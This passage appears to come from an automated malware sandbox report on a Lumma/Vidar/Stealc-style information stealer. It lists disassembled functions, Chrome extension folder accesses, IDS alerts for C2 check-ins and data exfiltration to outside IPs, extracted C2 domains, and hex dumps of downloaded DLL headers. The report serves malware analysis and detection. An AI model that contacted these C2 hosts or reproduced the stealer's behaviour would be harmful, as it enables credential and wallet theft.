                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00413EA0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,2_2_00413EA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004013B4 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,12_2_004013B4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041391C GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,2_2_0041391C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+1Ch]9_2_0040C000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp]9_2_0040B810
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [ebp-14h]9_2_0043BC78
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, dword ptr [esp]9_2_0040CC80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, dword ptr [esp]9_2_0040C69D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]9_2_00413846
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+00000874h]9_2_0041E850
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [edx], cx9_2_0041E850
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [edx], cx9_2_0041F862
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edi, dword ptr [edx+ebx+3Ch]9_2_0043A830
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]9_2_004390C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp]9_2_0043E8D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]9_2_0043E080
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax9_2_00413888
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [edx], cx9_2_0041F8B7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]9_2_0041F8B7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp]9_2_0041D940
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, byte ptr [edx]9_2_00431950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ecx], al9_2_00415172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ecx], al9_2_00415172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [ebp-24h]9_2_00415172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx eax, word ptr [ebx]9_2_0043F9E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], 625B6034h9_2_004211B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [esp], 00000000h9_2_00413A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esi+000000D8h]9_2_0042A2DC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+34h]9_2_0042A2DC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+34h]9_2_0042A2DC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esi+18h]9_2_0042A2DC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh9_2_0042A2DC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]9_2_004122E6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h9_2_0043F290
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al9_2_00427B30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx9_2_00423BE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [ecx], ax9_2_0041DBEA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]9_2_0043E390
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]9_2_0043D470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]9_2_0043DC70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h9_2_0041C400
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, dword ptr [ebp-10h]9_2_0041E411
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]9_2_004104D1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+38h]9_2_0040F578
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp edx9_2_0041CDED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [ebx+01h], 00000000h9_2_0041CDED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]9_2_00424640
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx9_2_0041C660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h9_2_00415E62
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esi+000000D8h]9_2_0042866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]9_2_00403E70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+00000874h]9_2_0041E6C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [edx], cx9_2_0041E6C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx9_2_00423F07
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]9_2_0043DF90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp edx9_2_0043A796

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.4:49739 -> 147.45.68.138:80
                Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 147.45.68.138:80 -> 192.168.2.4:49739
                Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 147.45.68.138:80 -> 192.168.2.4:49739
                Source: Network trafficSuricata IDS: 2055575 - Severity 1 - ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (awwardwiqi .shop) : 192.168.2.4:56576 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2055576 - Severity 1 - ET MALWARE Observed Lumma Stealer Related Domain (awwardwiqi .shop in TLS SNI) : 192.168.2.4:49741 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2055479 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop) : 192.168.2.4:55775 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2055489 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (locatedblsoqp .shop) : 192.168.2.4:49742 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2055483 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop) : 192.168.2.4:64147 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2055493 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (traineiwnqo .shop) : 192.168.2.4:49743 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2055493 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (traineiwnqo .shop) : 192.168.2.4:49745 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.4:49744 -> 95.164.119.162:80
                Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 147.45.68.138:80 -> 192.168.2.4:49751
                Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 147.45.68.138:80 -> 192.168.2.4:49751
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49742 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49741 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49742 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49741 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49743 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49743 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49745 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49745 -> 188.114.96.3:443
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: traineiwnqo.shop
                Source: Malware configuration extractorURLs: caffegclasiqwp.shop
                Source: Malware configuration extractorURLs: awwardwiqi.shop
                Source: Malware configuration extractorURLs: stamppreewntnq.shop
                Source: Malware configuration extractorURLs: evoliutwoqm.shop
                Source: Malware configuration extractorURLs: millyscroqwp.shop
                Source: Malware configuration extractorURLs: condedqpwqm.shop
                Source: Malware configuration extractorURLs: locatedblsoqp.shop
                Source: Malware configuration extractorURLs: stagedchheiqwo.shop
                Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199761128941
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Aug 2024 20:52:20 GMTContent-Type: application/octet-streamContent-Length: 2459136Last-Modified: Fri, 24 Nov 2023 13:43:06 GMTConnection: keep-aliveETag: "6560a86a-258600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 69 a8 60 65 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 25 00 d4 20 00 00 ca 04 00 00 00 00 00 7b 44 00 00 00 10 00 00 00 f0 20 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 25 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 db 23 00 f1 36 00 00 9c a2 24 00 28 00 00 00 00 d0 24 00 cc 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 24 00 88 e2 00 00 60 b2 23 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 b1 23 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 24 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 47 d3 20 00 00 10 00 00 00 d4 20 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 91 22 03 00 00 f0 20 00 00 24 03 00 00 d8 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 34 7c 00 00 00 20 24 00 00 62 00 00 00 fc 23 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b4 10 00 00 00 a0 24 00 00 12 00 00 00 5e 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 30 30 63 66 67 00 00 0e 01 00 00 00 c0 24 00 00 02 00 00 00 70 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 cc 12 00 00 00 d0 24 00 00 14 00 00 00 72 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 35 ff 00 00 00 f0 24 00 00 00 01 00 00 86 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Aug 2024 20:52:26 GMTContent-Type: application/octet-streamContent-Length: 685392Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-a7550"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Aug 2024 20:52:27 GMTContent-Type: application/octet-streamContent-Length: 608080Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-94750"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Aug 2024 20:52:27 GMTContent-Type: application/octet-streamContent-Length: 450024Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-6dde8"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 